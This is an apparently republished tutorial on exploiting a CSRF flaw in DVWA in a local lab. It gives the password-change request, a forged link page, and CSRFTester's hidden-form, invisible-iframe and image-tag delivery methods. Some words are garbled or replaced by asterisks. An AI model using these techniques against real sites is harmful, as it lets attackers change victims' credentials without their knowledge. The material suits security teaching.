Shulou(Shulou.com)06/01 Report--

The CSRF*** process is:

* user discovers CSRF vulnerability-construct code-send to victim-victim opens-victim executes code-completes *

Complete the conditions for success:

The administrator is in the background of the site, or the administrator's session is not invalid.

Test the website:

DVWA Application Environment in owaspbwa Environment

The test content is CSRF vulnerability

As shown in the figure:

The HTTP request to change the login password is as follows:

GET / dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change HTTP/1.1

Host: 192.168.232.132

Connection: close

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2984.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,p_w_picpath/webp,*/*;q=0.8

Referer: https://192.168.232.132/dvwa/vulnerabilities/csrf/

Accept-Encoding: gzip, deflate, sdch, br

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie: security=low; PHPSESSID=3i35050qluj2hvvqu9rk760o81; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada

Nginx test

Build the nginx environment locally, forge the http request, submit the http request, and directly modify the login password of DVWA in 192.168.232.132!

Create a csrf.html file as follows:

Csrf vulnerability testing

This is a CSRF test.

Click here

Access CSRF.html, as shown in the figure

Click the hyperlink to send the request successfully, and modify the login password of DVWA, as shown in the figure:

Use the modified password to log in directly to the background!

Tool: OWASP-CSRFTester-1.0.jar, which can automatically generate * * files with different contents.

The browser sets the proxy, the port is 8008, the software looks to see if there is any token, and then starts to use it.

Report Type in the software allows you to choose which method to use for *:

Forms: create an form form. Content is hidden (hidden) and invisible to users (POST, GET)

IFrame: create an iframe framework with a height and width of 0 and invisible to the user. (POST, GET)

IMG: create an IMG tag (GET only).

XHR: create an AJAX request (POST, GET)

Link: create a hyperlink with a tag (GET only)

You can usually use the first one.

The second one is easy to find (this is not recommended if you are a novice and are not familiar with JavaScript)

The third one can only send GET requests, which is limited.

The fourth has cross-domain restrictions, and some browsers are not allowed to send cross-domain requests unless the site is set up.

The fifth one needs to click to trigger (of course, it can be changed to automatic trigger), and the other is that he can only send GET requests.

This test is all for the local environment, if there are any similarities, it is a coincidence!

That's it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.